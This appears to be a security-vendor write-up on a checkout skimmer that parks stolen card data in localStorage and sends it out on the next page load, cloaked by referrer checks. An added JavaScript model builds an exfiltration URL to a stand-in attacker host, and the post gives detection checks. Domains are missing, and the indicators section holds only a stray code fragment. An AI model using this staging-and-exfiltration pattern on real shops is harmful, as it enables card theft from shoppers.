
Postponed Exfiltration Evades Detection


by Sansec Forensics Team

Published in Threat Research − May 09, 2023

Criminals have come up with a clever way to steal customer data only after the regular checkout flow has completed. Because nothing leaves the browser during the payment step itself, this attack is very hard to detect.


The domain has recently emerged as a threat. It employs several techniques to evade detection and targets unsuspecting shoppers, but what makes it especially deceptive is that it postpones exfiltration until after the checkout flow has completed, which makes it an alarming threat to online shoppers.

Pretense of Legitimacy

To appear authentic, the loader checks the referrer address. If it doesn't match the store's URL, it serves a script from This helps it disguise its true identity and intentions. In practice this means that fetching the script directly, with no Referer header or from another origin, returns only the harmless version; to see the real payload, request it with the Referer set to a page on the affected store.

Furthermore, the loader masquerades as a Google Analytics script and goes the extra mile to mimic legitimate behavior. For instance, it sets harmless-looking localStorage values such as localStorage.setItem("font", "Helvetica"), creating the illusion of a genuine analytics script.

Surprisingly, the code is deliberately left unobfuscated, possibly because plain code that resembles a familiar analytics script draws less scrutiny than an obfuscated blob would.

Loading & Exfiltration

When a user clicks the checkout button, the skimmer collects their credit card details. It enriches this data with the user's IP address and user agent by calling

The serialized data is stored in localStorage under the key _sutoken.

On subsequent page requests, the loader checks localStorage for that key and, if it is present, adds a serv parameter to the request URL (serv=<serialized_cc_data>).

This enables the exfiltration of stolen data to a remote server without any request being made during checkout itself. Monitoring that only watches network traffic on the payment page therefore sees nothing suspicious; the data leaves on whatever page the shopper visits next, inside an ordinary-looking script request. A reproduction must continue browsing past the checkout step and inspect the script loads that follow.
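The two-phase flow described above, together with two checks an analyst can run against a store page, as an added example that is not the skimmer's code nor Sansec's own tooling. The attacker domain is elided on this page, so ATTACKER_SCRIPT is an assumed placeholder; using JSON as the serialization format and the loader's own script URL as the exfil carrier are also assumptions of this model.

```javascript
// Added example, not the skimmer's own code: a Node-runnable model of the
// two-phase exfiltration described above, followed by two checks an analyst
// can run against a store page. The attacker domain is elided on the page, so
// ATTACKER_SCRIPT is an assumed placeholder; JSON as the serialisation format
// and the loader's own URL as the exfil carrier are also assumptions.
const ATTACKER_SCRIPT = "https://attacker.example/analytics.js"; // assumption

// Stand-in for window.localStorage (same length/key/getItem/setItem API) so
// the example runs outside a browser; the checks below work on the real one.
class MemoryStorage {
  constructor() { this.map = new Map(); }
  get length() { return this.map.size; }
  key(i) { return [...this.map.keys()][i] ?? null; }
  getItem(key) { return this.map.has(key) ? this.map.get(key) : null; }
  setItem(key, value) { this.map.set(key, String(value)); }
}

// Phase 1, checkout page: nothing is sent. The card fields, enriched with the
// client's IP and user agent, are only parked in localStorage under _sutoken.
function stageAtCheckout(storage, cardFields, clientInfo) {
  const record = { ...cardFields, ip: clientInfo.ip, ua: clientInfo.userAgent };
  storage.setItem("_sutoken", JSON.stringify(record));
}

// Phase 2, any later page: if staged data exists, the loader appends it as a
// `serv` query parameter, so the card data leaves the browser inside an
// ordinary-looking script fetch rather than a request from the payment step.
function buildLoaderUrl(storage, baseUrl = ATTACKER_SCRIPT) {
  const staged = storage.getItem("_sutoken");
  if (staged === null) return baseUrl;
  const url = new URL(baseUrl);
  url.searchParams.set("serv", staged);
  return url.toString();
}

// ---- Detection side -------------------------------------------------------

// Luhn checksum over a digit string; anything outside PAN length is rejected.
function luhnValid(digits) {
  if (!/^\d{13,19}$/.test(digits)) return false;
  let sum = 0;
  let double = false;
  for (let i = digits.length - 1; i >= 0; i--) {
    let d = digits.charCodeAt(i) - 48;
    if (double) { d *= 2; if (d > 9) d -= 9; }
    sum += d;
    double = !double;
  }
  return sum % 10 === 0;
}

// Yields every string or number leaf inside a parsed value, at any depth.
function* leafStrings(value) {
  if (typeof value === "string" || typeof value === "number") yield String(value);
  else if (value && typeof value === "object") {
    for (const child of Object.values(value)) yield* leafStrings(child);
  }
}

// True if the raw string, or any leaf of the JSON it decodes to, is a
// Luhn-valid card number (spaces and dashes tolerated).
function containsPan(raw) {
  let root;
  try { root = JSON.parse(raw); } catch { root = raw; }
  for (const s of leafStrings(root)) {
    if (luhnValid(s.replace(/[ -]/g, ""))) return true;
  }
  return false;
}

// Check 1: staged card data waiting in localStorage. The page names the key
// _sutoken, but a key is trivially renamed, so every key is inspected.
function findStagedCardData(storage) {
  const hits = [];
  for (let i = 0; i < storage.length; i++) {
    const key = storage.key(i);
    if (containsPan(storage.getItem(key))) hits.push(key);
  }
  return hits;
}

// Check 2: an outbound script URL (from a CSP report, a proxy log, or a
// MutationObserver watching <script> insertions) carrying a PAN in its query.
function scriptUrlLeaksCardData(urlString) {
  const url = new URL(urlString);
  for (const [, value] of url.searchParams) {
    if (containsPan(value)) return true;
  }
  return false;
}

// Constructed walkthrough using a well-known test card number.
const demoStorage = new MemoryStorage();
demoStorage.setItem("font", "Helvetica"); // the decoy value mentioned on the page
console.log("before checkout:", findStagedCardData(demoStorage), buildLoaderUrl(demoStorage));
stageAtCheckout(
  demoStorage,
  { cc: "4111 1111 1111 1111", exp: "12/27", cvv: "123" },
  { ip: "203.0.113.7", userAgent: "Mozilla/5.0 (constructed)" },
);
console.log("after checkout:", findStagedCardData(demoStorage));
console.log("next page load leaks card data:", scriptUrlLeaksCardData(buildLoaderUrl(demoStorage)));
```

In a live investigation, run the storage check after completing a test purchase and then load one or two more pages, since the staged record only matters once a later page picks it up; capture the script requests made on those follow-up pages and pass their URLs through the second check.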

Indicators of Compromise (IOCs)



class DetachCheckout extends DetachHandler
